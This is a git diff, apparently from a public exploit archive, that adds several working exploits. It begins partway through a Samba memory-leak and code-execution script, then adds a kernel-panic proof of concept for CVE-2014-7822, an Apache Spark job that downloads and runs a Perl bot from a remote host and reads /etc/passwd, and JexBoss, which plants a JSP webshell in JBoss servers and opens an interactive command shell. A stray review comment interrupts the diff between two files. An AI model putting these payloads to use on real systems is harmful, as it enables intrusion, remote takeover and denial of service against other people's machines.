= answers[0] + print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr)) + + answers = 
leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False) + if answers is None: + print(' [-] cannot leak pipes_struct address :(') + return False + pipes_struct_addr = answers[2] + print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr)) + + current_pdu_sent_addr = pipes_struct_addr+0x84 + print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr)) + # change pipes->out_data.current_pdu_sent to dump memory + return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True) + +def dump_smbd_find_bininfo(info): + def recv_till_string(data, s): + pos = len(data) + while True: + data += force_recv() + if len(data) == pos: + print('no more data !!!') + return None + p = data.find(s, pos-len(s)) + if p != -1: + return (data, p) + pos = len(data) + return None + + def lookup_dynsym(dynsym, name_offset): + addr = 0 + i = 0 + offset_str = pack(" 0: + if mem[pos:pos+16] == '\x00'*16: + break + pos -= 16 # sym entry size is 16 bytes + if pos <= 0: + print(' [-] found wrong .dynsym section at {:x}'.format(pos)) + return None + dynsym_offset = pos + print(' [*] found .dynsym section at {:x}'.format(dynsym_offset)) + dynsym = mem[dynsym_offset:] + + # find sock_exec + dynstr, pos = recv_till_string(dynstr, '\x00sock_exec\x00') + print(' [*] found sock_exec string at {:x}'.format(pos+1)) + sock_exec_offset = lookup_dynsym(dynsym, pos+1) + print(' [*] sock_exec offset {:x}'.format(sock_exec_offset)) + + #info['mem'] = mem # smbd data before .dynsym section + info['dynsym'] = dynsym + info['dynstr'] = dynstr # incomplete section + info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset + print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr'])) + + # Note: can continuing memory dump to find ROP + + force_dce_disconnect() + +######## +# code execution +######## +def call_sock_exec(info): + prefix_len = addr2utf_prefix(info['sock_exec_addr']) + if prefix_len == 3: + return 
False # too bad... cannot call + if prefix_len == 2: + prefix_len = 0 + fake_talloc_chunk_exec = pack(" +#include +#include +#include +#include +#include +#include + +#define EXPLOIT_NAME "cve-2014-7822" +#define EXPLOIT_TYPE DOS + +#define JUNK_SIZE 30000 + +/* ----------------------- functions ----------------------------*/ + + +/* Useful: + * ++============+===============================+===============================+ +| \ File flag| | | +| \ | !EXT4_EXTENTS_FL | EXT4_EXTETNS_FL | +|Fs Features\| | | ++------------+-------------------------------+-------------------------------+ +| !extent | write: 2194719883264 | write: -------------- | +| | seek: 2199023251456 | seek: -------------- | ++------------+-------------------------------+-------------------------------+ +| extent | write: 4402345721856 | write: 17592186044415 | +| | seek: 17592186044415 | seek: 17592186044415 | ++------------+-------------------------------+-------------------------------+ +*/ + + +/** + * Poc for cve_2014_7822 vulnerability + */ +int main() +{ + int pipefd[2]; + int result; + int in_file; + int out_file; + int zulHandler; + loff_t viciousOffset = 0; + + char junk[JUNK_SIZE] ={0}; + + result = pipe(pipefd); + + // Create and clear zug.txt and zul.txt files + system("cat /dev/null > zul.txt"); + system("cat /dev/null > zug.txt"); + + // Fill zul.txt with A + zulHandler = open("zul.txt", O_RDWR); + memset(junk,'A',JUNK_SIZE); + write(zulHandler, junk, JUNK_SIZE); + close(zulHandler); + + //put content of zul.txt in pipe + viciousOffset = 0; + in_file = open("zul.txt", O_RDONLY); + result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE); + close(in_file); + + + // Put content of pipe in zug.txt + out_file = open("zug.txt", O_RDWR); + viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!! 
+ printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset);
+
+ result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615
+ if (result == -1)
+ {
+ printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno));
+ exit(1);
+ }
+ close(out_file);
+
+ close(pipefd[0]);
+ close(pipefd[1]);
+
+
+ //Open zug.txt
+ in_file = open("zug.txt", O_RDONLY);
+ close(in_file);
+
+ printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n");
+
+ return 0;
+}
diff --git a/platforms/linux/remote/36562.txt b/platforms/linux/remote/36562.txt
new file mode 100755
index 000000000..700c6ab6f
--- /dev/null
+++ b/platforms/linux/remote/36562.txt
@@ -0,0 +1,63 @@
+# Exploit Title: Arbitary Code Execution in Apache Spark Cluster
+# Date: 23/03/2015
+# Exploit Author: AkhlD (AkhilDas) CodeBreach.in
+# Vendor Homepage: https://spark.apache.org/
+# Software Link: https://spark.apache.org/downloads.html
+# Version: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)
+# Tested on: 1.2.1
+
+# Credits: Mayur Rustagi (@mayur_rustagi), Patrick Wendel (@pwendell) for
+reviewing.
+# Reference(s) :
+http://codebreach.in/blog/2015/03/arbitary-code-execution-in-unsecured-apache-spark-cluster/
+# Exploit URL : https://github.com/akhld/spark-exploit/
+
+# Spark clusters which are not secured with proper firewall can be taken
+over easily (Since it does not have
+# any authentication mechanism), this exploit simply runs arbitarty codes
+over the cluster.
+# All you have to do is, find a vulnerable Spark cluster (usually runs on
+port 7077) add that host to your
+# hosts list so that your system will recognize it (here its
+spark-b-akhil-master pointing
+# to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with arbitary
+codes that you want to execute.
+
+# Language: Scala
+
+
+import org.apache.spark.{SparkContext, SparkConf}
+
+/**
+ * Created by akhld on 23/3/15.
+ */
+
+object Exploit {
+ def main(arg: Array[String]) {
+ val sconf = new SparkConf()
+ .setMaster("spark://spark-b-akhil-master:7077") // Set this to the
+vulnerable host URI
+ .setAppName("Exploit")
+ .set("spark.cores.max", "2")
+ .set("spark.executor.memory", "2g")
+ .set("spark.driver.host","hacked.work") // Set this to your host from
+where you launch the attack
+
+ val sc = new SparkContext(sconf)
+ sc.addJar("target/scala-2.10/spark-exploit_2.10-1.0.jar")
+
+ val exploit = sc.parallelize(1 to 1).map(x=>{
+ //Replace these with whatever you want to get executed
+ val x = "wget https://mallicioushost/mal.pl -O bot.pl".!
+ val y = "perl bot.pl".!
+ scala.io.Source.fromFile("/etc/passwd").mkString
+ })
+ exploit.collect().foreach(println)
+ }
+}
+
+
+
+
+Thanks
+Best Regards
diff --git a/platforms/multiple/webapps/36575.py b/platforms/multiple/webapps/36575.py
new file mode 100755
index 000000000..57dbd3b7c
--- /dev/null
+++ b/platforms/multiple/webapps/36575.py
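Review bot: The advisory says the cluster has no authentication mechanism but gives a defender nothing to act on; a `# Mitigation:` line beside `# Version:` should name Spark's `spark.authenticate` shared-secret setting and keeping the master port (7077 per the text) off untrusted networks. The `.set("spark.driver.host","hacked.work")` line with its "your host from where you launch the attack" comment shows that executors connect back to the submitting host, which is an outbound connection from worker nodes that network monitoring can flag; that is worth stating in the overview. `# Version: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)` also sits next to `# Tested on: 1.2.1`, so the 1.3.x claim is untested as written and should say so.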
@@ -0,0 +1,440 @@
+# coding: utf-8
+# JexBoss v1.0. @autor: João Filho Matos Figueiredo (joaomatosf@gmail.com)
+# Updates: https://github.com/joaomatosf/jexboss
+# Free for distribution and modification, but the authorship should be preserved.
+
+
+import httplib, sys, urllib, os, time
+from urllib import urlencode
+
+RED = '\x1b[91m'
+RED1 = '\033[31m'
+BLUE = '\033[94m'
+GREEN = '\033[32m'
+BOLD = '\033[1m'
+NORMAL = '\033[0m'
+ENDC = '\033[0m'
+
+def getHost(url):
+ tokens = url.split("://")
+ if len(tokens) == 2: #foi fornecido protocolo
+ return tokens[1].split(":")[0]
+ else:
+ return tokens.split(":")[0]
+
+def getProtocol(url):
+ tokens = url.split("://")
+ if tokens[0] == "https":
+ return "https"
+ else:
+ return "http"
+
+def getPort(url):
+ token = url[6:].split(":")
+ if len(token) == 2:
+ return token[1]
+ elif getProtocol(url) == "https":
+ return 443
+ else:
+ return 80
+
+def getConnection(url):
+ if getProtocol(url) == "https":
+ return httplib.HTTPSConnection(getHost(url), getPort(url))
+ else:
+ return httplib.HTTPConnection(getHost(url), getPort(url))
+
+
+def getSuccessfully(url, path):
+ result = 404
+ time.sleep(5)
+ conn = getConnection(url)
+ conn.request("GET", path)
+ result = conn.getresponse().status
+ if result == 404:
+ conn.close()
+ time.sleep(7)
+ conn = getConnection(url)
+ conn.request("GET", path)
+ result = conn.getresponse().status
+ conn.close()
+ return result
+
+def checkVul(url):
+
+ print ( GREEN +" ** Checking Host: %s **\n" %url )
+
+ path = { "jmx-console" : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
+ "web-console" : "/web-console/ServerInfo.jsp",
+ "JMXInvokerServlet" : "/invoker/JMXInvokerServlet"}
+
+ for i in path.keys():
+ try:
+ print GREEN + " * Checking %s: \t" %i + ENDC,
+ conn = getConnection(url)
+ conn.request("HEAD", path[i])
+ path[i] = conn.getresponse().status
+ if path[i] == 200 or path[i] == 500:
+ print RED + "[ VULNERABLE ]" + ENDC
+ else: print GREEN + "[ OK ]"
+ conn.close()
+ except:
+ print RED + "\n * An error ocurred while contaction the host %s\n" %url + ENDC
+ path[i] = 505
+
+ return path
+
+def autoExploit(url, type):
+
+ # exploitJmxConsoleFileRepository: tested and working in jboss 4 and 5
+ # exploitJmxConsoleMainDeploy: tested and working in jboss 4 and 6
+ # exploitWebConsoleInvoker: tested and working in jboss 4
+ # exploitJMXInvokerFileRepository: tested and working in jboss 4 and 5
+
+ print GREEN + ("\n * Sending exploit code to %s. Wait...\n" %url)
+ result = 505
+ if type == "jmx-console":
+ result = exploitJmxConsoleFileRepository(url)
+ if result != 200 and result != 500:
+ result = exploitJmxConsoleMainDeploy(url)
+ elif type == "web-console":
+ result = exploitWebConsoleInvoker(url)
+ elif type == "JMXInvokerServlet":
+ result = exploitJMXInvokerFileRepository(url)
+
+ if result == 200 or result == 500:
+ print GREEN + " * Successfully deployed code! Starting command shell, wait...\n" + ENDC
+ shell_http(url, type)
+ else:
+ print (RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n"
+ " Waiting for 7 seconds...\n "+ ENDC)
+ time.sleep(7)
+
+def shell_http(url, type):
+ if type == "jmx-console" or type == "web-console":
+ path = '/jbossass/jbossass.jsp?'
+ elif type == "JMXInvokerServlet":
+ path = '/shellinvoker/shellinvoker.jsp?'
+
+ conn = getConnection(url)
+ conn.request("GET", path)
+ conn.close()
+ time.sleep(7)
+ resp = ""
+ #clear()
+ print " * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n"
+ print RED+" * "+url+": \n"+ENDC
+ headers = {"User-Agent" : "jexboss"}
+ for cmd in ['uname -a', 'cat /etc/issue', 'id']:
+ conn = getConnection(url)
+ cmd = urlencode({"ppp": cmd})
+ conn.request("GET", path+cmd, '', headers)
+ resp += " "+conn.getresponse().read().split(">")[1]
+ print resp,
+
+ while 1:
+ print BLUE + "[Type commands or \"exit\" to finish]"
+ cmd=raw_input("Shell> "+ENDC)
+ #print ENDC
+ if cmd == "exit":
+ break
+ conn = getConnection(url)
+ cmd = urlencode({"ppp": cmd})
+ conn.request("GET", path+cmd, '', headers)
+ resp = conn.getresponse()
+ if resp.status == 404:
+ print RED+ " * Error contacting the commando shell. Try again later..."
+ conn.close()
+ continue
+ stdout = ""
+ try:
+ stdout = resp.read().split("pre>")[1]
+ except:
+ print RED+ " * Error contacting the commando shell. Try again later..."
+ if stdout.count("An exception occurred processing JSP page") == 1:
+ print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC
+ else: print stdout,
+ conn.close()
+
+def exploitJmxConsoleMainDeploy(url):
+ # MainDeployer
+ # does not work in jboss5 (bug in jboss5)
+ # shell in link
+ # /jmx-console/HtmlAdaptor
+ jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
+ payload =( "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service"
+ "=MainDeployer&methodIndex=19&arg0="+jsp)
+ print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell "
+ "\n available on: "+jsp +ENDC)
+ conn = getConnection(url)
+ conn.request("HEAD", payload)
+ result = conn.getresponse().status
+ conn.close()
+ return getSuccessfully(url, "/jbossass/jbossass.jsp")
+
+def exploitJmxConsoleFileRepository(url):
+ # DeploymentFileRepository
+ # tested and work in jboss4, 5.
+ # doest not work in jboss6
+ # shell jsp
+ # /jmx-console/HtmlAdaptor
+ jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61"
+ "%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C"
+ "%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"
+ "%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20"
+ "%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65"
+ "%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71"
+ "%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72"
+ "%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74"
+ "%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73"
+ "%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29"
+ "%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69"
+ "%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65"
+ "%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29"
+ "%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E"
+ "%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64"
+ "%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70"
+ "%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20"
+ "%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" )
+
+ payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
+ "DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
+ "jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St"
+ "ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True")
+
+ conn = getConnection(url)
+ conn.request("HEAD", payload)
+ result = conn.getresponse().status
+ conn.close()
+ return getSuccessfully(url, "/jbossass/jbossass.jsp")
+
+def exploitJMXInvokerFileRepository(url):
+ # tested and work in jboss4, 5
+ # MainDeploy, shell in data
+ # /invoker/JMXInvokerServlet
+ payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"
+ "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"
+ "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"
+ "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"
+ "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"
+ "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"
+ "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"
+ "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"
+ "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"
+ "\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"
+ "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"
+ "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"
+ "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"
+ "\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"
+ "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"
+ "\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"
+ "\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"
+ "\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"
+ "\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"
+ "\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"
+ "\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"
+ "\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"
+ "\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"
+ "\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"
+ "\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"
+ "\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"
+ "\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"
+ "\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
+ "\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"
+ "\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"
+ "\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"
+ "\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"
+ "\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"
+ "\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"
+ "\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"
+ "\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"
+ "\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"
+ "\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"
+ "\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"
+ "\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"
+ "\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"
+ "\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"
+ "\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"
+ "\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"
+ "\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"
+ "\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"
+ "\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"
+ "\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"
+ "\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"
+ "\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"
+ "\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"
+ "\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"
+ "\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
+ "\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"
+ "\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
+ "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"
+ "\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"
+ "\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"
+ "\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"
+ "\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"
+ "\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"
+ "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"
+ "\x00\x04\x70\x78")
+ conn = getConnection(url)
+ headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
+ "Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
+ conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers)
+ response = conn.getresponse()
+ result = response.status
+ if result == 401:
+ print " Retrying..."
+ conn.close()
+ conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers)
+ response = conn.getresponse()
+ result = response.status
+ if response.read().count("Failed") > 0:
+ result = 505
+ conn.close
+ return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp")
+
+def exploitWebConsoleInvoker(url):
+ # does not work in jboss5 (bug in jboss5)
+ # MainDeploy, shell in link
+ # /web-console/Invoker
+ #jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
+ #jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp)
+ #jsp = "\\x" + jsp
+ payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e"
+ "\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65"
+ "\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e"
+ "\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae"
+ "\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61"
+ "\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f"
+ "\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73"
+ "\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f"
+ "\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75"
+ "\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"
+ "\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65"
+ "\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a"
+ "\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f"
+ "\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06"
+ "\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61"
+ "\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58"
+ "\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
+ "\x2a"
+ #link
+ "\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61"
+ "\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f"
+ "\x73\x73\x61\x73\x73\x2e\x77\x61\x72"
+ #end
+ "\x75\x72\x00\x13\x5b"
+ "\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e"
+ "\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"
+ "\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e"
+ "\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e"
+ "\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63"
+ "\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00"
+ "\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"
+ "\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65"
+ "\x70\x6c\x6f\x79\x65\x72\x78")
+ conn = getConnection(url)
+ headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
+ "Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
+ conn.request("POST", "/web-console/Invoker", payload, headers)
+ response = conn.getresponse()
+ result = response.status
+ if result == 401:
+ print " Retrying..."
+ conn.close()
+ conn.request("HEAD", "/web-console/Invoker", payload, headers)
+ response = conn.getresponse()
+ result = response.status
+ conn.close
+ return getSuccessfully(url, "/jbossass/jbossass.jsp")
+
+
+def clear():
+ if os.name == 'posix':
+ os.system('clear')
+ elif os.name == ('ce', 'nt', 'dos'):
+ os.system('cls')
+
+def checkArgs(args):
+ if len(args) < 2 or args[1].count('.') < 1:
+ return 1,"You must provide the host name or IP address you want to test."
+ elif len(args[1].split('://')) == 1:
+ return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1])
+ elif args[1].count('http') == 1 and args[1].count('.') > 1:
+ return 0, ""
+ else:
+ return 1, 'Parâmetro inválido'
+
+def banner():
+ clear()
+ print (RED1+"\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n"
+ " | |\n"
+ " | @author: João Filho Matos Figueiredo |\n"
+ " | @contact: joaomatosf@gmail.com |\n"
+ " | |\n"
+ " | @update: https://github.com/joaomatosf/jexboss |\n"
+ " #______________________________________________________#\n\n" )
+
+banner()
+# check python version
+if sys.version_info[0] == 3:
+ print (RED + "\n * Not compatible with version 3 of python.\n"
+ " Please run it with version 2.7 or lower.\n\n"
+ +BLUE+" * Example:\n"
+ " python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC )
+ sys.exit(1)
+
+# check Args
+status, message = checkArgs(sys.argv)
+if status == 0:
+ url = sys.argv[1]
+elif status == 1:
+ print RED + "\n * Error: %s" %message
+ print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC
+ sys.exit(status)
+elif status == 2:
+ url = ''.join(['http://',sys.argv[1]])
+
+# check vulnerabilities
+mapResult = checkVul(url)
+
+# performs exploitation
+for i in ["jmx-console", "web-console", "JMXInvokerServlet"]:
+ if mapResult[i] == 200 or mapResult[i] == 500:
+ print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n"
+ " This operation will provide a simple command shell to execute commands on the server..\n"
+ +RED+" Continue only if you have permission!" +ENDC)
+ if raw_input(" yes/NO ? ").lower() == "yes":
+ autoExploit(url, i)
+
+# resume results
+if mapResult.values().count(200) > 0:
+ banner()
+ print RED+ " Results: potentially compromised server!" +ENDC
+ print (GREEN+" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n"
+ " Recommendations: \n"
+ " - Remove web consoles and services that are not used, eg:\n"
+ " $ rm web-console.war\n"
+ " $ rm http-invoker.sar\n"
+ " $ rm jmx-console.war\n"
+ " $ rm jmx-invoker-adaptor-server.sar\n"
+ " $ rm admin-console.war\n"
+ " - Use a reverse proxy (eg. nginx, apache, f5)\n"
+ " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"
+ " - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n"
+ " References:\n"
